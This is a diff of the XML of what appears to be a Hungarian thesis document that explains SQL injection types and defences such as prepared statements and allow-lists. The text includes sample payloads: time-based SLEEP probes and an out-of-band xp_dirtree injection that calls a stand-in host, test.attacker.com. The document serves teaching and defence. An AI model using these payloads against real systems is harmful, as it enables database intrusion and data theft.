+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -4517,7 +4994,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (error-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4730,23 +5221,35 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc71019995"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc71124910"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:r>
-        <w:t>, inferential</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inferential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4891,7 +5394,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (boolean-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5035,7 +5552,97 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+        <w:t xml:space="preserve"> SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>doby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5278,7 +5885,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(time-based) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>time-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5322,11 +5943,19 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5350,6 +5979,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5358,13 +5988,32 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-SLEEP(15)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5394,7 +6043,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5426,7 +6089,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5445,7 +6144,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5460,7 +6173,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc71019996"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc71124911"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5468,12 +6181,25 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-band)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5554,6 +6280,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5562,6 +6289,7 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -5677,7 +6405,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5712,7 +6476,79 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5836,7 +6672,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc71019997"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc71124912"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5954,13 +6790,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
-      </w:r>
+        <w:t>Elkészített</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>utasítások</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (prepared statements) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>használata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6027,12 +6897,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6214,13 +7086,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
-      </w:r>
+        <w:t>Tárolt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>eljárások</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (stored procedures) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>használata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6327,6 +7233,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6335,6 +7242,7 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6441,13 +7349,47 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-      </w:r>
+        <w:t>Engedélyezőlista</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (allow-list) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bemenetének</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ellenőrzése</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6564,7 +7506,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („bind variables”).</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>bind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6684,6 +7654,7 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6698,7 +7669,16 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ableName </w:t>
+        <w:t>ableName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6837,8 +7817,97 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Az </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>összes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>felhasználó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>által</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>adott</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bemenet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>elkerülése</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6952,7 +8021,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71019998"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71124913"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
@@ -6967,22 +8036,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Mi a gépi tanulás?</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7019,92 +8072,52 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Hogyan működik a gépi tanulás? (4)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A gépi tanulás (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vagy modell) felépítésének négy alapvető lépése van</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gépi tanulási módszerek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>épi tanulási módszerek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek három fő kategóriájuk van: felügyelt, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felügyelet nélküli és félig felügyelt tanulás.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Az implementált programom a legelső módszert használja, így a fejezetben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ehhez adok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szélesebb körű </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ismeretet.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7132,7 +8145,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc71019999"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc71124914"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7159,77 +8172,14 @@
